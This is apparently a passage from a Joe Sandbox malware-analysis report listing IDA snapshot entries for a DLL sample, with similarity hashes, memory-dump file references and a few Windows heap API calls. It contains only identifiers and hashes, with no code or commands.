                                                          Yara matches
                                                          Similarity
                                                          • API ID: CriticalSection$Leave$Entermemmove
                                                          • String ID:
                                                          • API String ID: 72348100-0
                                                          • Opcode ID: b2c8c82c961791ae8f53fef40cbf23f5f2d1006caee183a225647bbe481849f1
                                                          • Instruction ID: 50b30369da4871338d3e5076dbae6429fca2f6132d25b88ab6d76ff2db9ab769
                                                          • Opcode Fuzzy Hash: b2c8c82c961791ae8f53fef40cbf23f5f2d1006caee183a225647bbe481849f1
                                                          • Instruction Fuzzy Hash: AE11BF3A3042154FAB08EF749C858EFB799FF94290704452EF907CB346DB71ED0886A0
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CharNext$free$AttributesCreateDirectoryErrorFileLastlstrcpylstrlenmalloc
                                                          • String ID:
                                                          • API String ID: 3289936468-0
                                                          • Opcode ID: 242f31426ad57f69496cf5a359c15a3d78e904203da98ddbbe90ee3972058db7
                                                          • Instruction ID: e5bcf6fcaf6474cf11c06b2f5d739369e89de0018cd217908e7742b1c919ccc1
                                                          • Opcode Fuzzy Hash: 242f31426ad57f69496cf5a359c15a3d78e904203da98ddbbe90ee3972058db7
                                                          • Instruction Fuzzy Hash: DB0180B5C04665AFE711DF188C44BEABFE8FB0AAA0F040656E995A3645C7345E028BE1
                                                          APIs
                                                          • GetProcessHeap.KERNEL32(00000000,?,?), ref: 100069C0
                                                          • HeapReAlloc.KERNEL32(00000000), ref: 100069C7
                                                          • GetProcessHeap.KERNEL32(00000000,?), ref: 100069D5
                                                          • HeapAlloc.KERNEL32(00000000), ref: 100069DC
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Heap$AllocProcess
                                                          • String ID:
                                                          • API String ID: 1617791916-0
                                                          • Opcode ID: 8467137ebeee5c80095378d21e104a4eec5c859026c898dd95d044c84a894ab9
                                                          • Instruction ID: 47877cb6062bd81062e19e0104322f8483190e017e00c23344b6b727d1ead73d
                                                          • Opcode Fuzzy Hash: 8467137ebeee5c80095378d21e104a4eec5c859026c898dd95d044c84a894ab9
                                                          • Instruction Fuzzy Hash: B6D04C75604212ABFE449BA8CD8DFAA7BADFB84745F058948F54DCA094C6709840DB31